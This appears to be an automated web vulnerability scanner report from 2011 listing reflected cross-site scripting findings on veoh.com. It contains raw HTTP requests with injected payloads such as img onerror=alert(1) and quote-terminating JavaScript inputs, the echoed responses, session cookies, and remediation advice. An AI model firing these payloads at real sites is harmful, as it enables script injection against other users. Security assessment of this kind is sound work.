<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurea9c05<img src=a onerror=alert(1)>ebb993b4b67"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1adb'%3b90455422d30 was submitted in the REST URL parameter 6. This input was echoed as a1adb';90455422d30 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmSa1adb'%3b90455422d30 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:47 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=42 Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9 was submitted in the REST URL parameter 4. This input was echoed as 1f894<img src=a onerror=alert(1)>9de463e3ec9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=70
Content-Length: 74555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure1f894<img src=a onerror=alert(1)>9de463e3ec9"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735 was submitted in the REST URL parameter 4. This input was echoed as 81165"><img src=a onerror=alert(1)>17f00c2e735 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 74599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure81165"><img src=a onerror=alert(1)>17f00c2e735/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c9'%3b11294ec602e was submitted in the REST URL parameter 6. This input was echoed as d86c9';11294ec602e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQzd86c9'%3b11294ec602e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 94049
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 218d8'%3b167cb8b726a was submitted in the REST URL parameter 6. This input was echoed as 218d8';167cb8b726a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr218d8'%3b167cb8b726a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 94329
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a was submitted in the REST URL parameter 4. This input was echoed as 1b947"><img src=a onerror=alert(1)>1a22388a0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:34:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=75
Content-Length: 57867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure4957f1b947"><img src=a onerror=alert(1)>1a22388a0a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 was submitted in the REST URL parameter 4. This input was echoed as 265a6<img src=a onerror=alert(1)>59b74d09c35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 57833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure4957f265a6<img src=a onerror=alert(1)>59b74d09c35"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the name of an HTML tag attribute. The payload f915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7 was submitted in the REST URL parameter 4. This input was echoed as f915b><img src=a onerror=alert(1)>991aab001b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f"><img%20srcf915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=40
Content-Length: 76933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <img srcf915b><img src=a onerror=alert(1)>991aab001b7=a onerror=alert(1)> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35 was submitted in the REST URL parameter 4. This input was echoed as ddc51<img src=a onerror=alert(1)>095a10c6f35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_ddc51<img src=a onerror=alert(1)>095a10c6f35=a onerror=alert(1)> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee was submitted in the REST URL parameter 4. This input was echoed as 94381<img src=a onerror=alert(1)>52a0288ccee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d81594381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a was submitted in the REST URL parameter 4. This input was echoed as ba538"><img src=a onerror=alert(1)>0ced7d2746a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/animationba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=12
Content-Length: 74545
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/animationba538"><img src=a onerror=alert(1)>0ced7d2746a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d was submitted in the REST URL parameter 4. This input was echoed as cd065<img src=a onerror=alert(1)>a077cbaf92d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/animationcd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 74501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_animationcd065<img src=a onerror=alert(1)>a077cbaf92d"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c7e'%3b1844de9a605 was submitted in the REST URL parameter 6. This input was echoed as 14c7e';1844de9a605 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/animation/watch/v20767083WdnCj7gW14c7e'%3b1844de9a605 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 93332
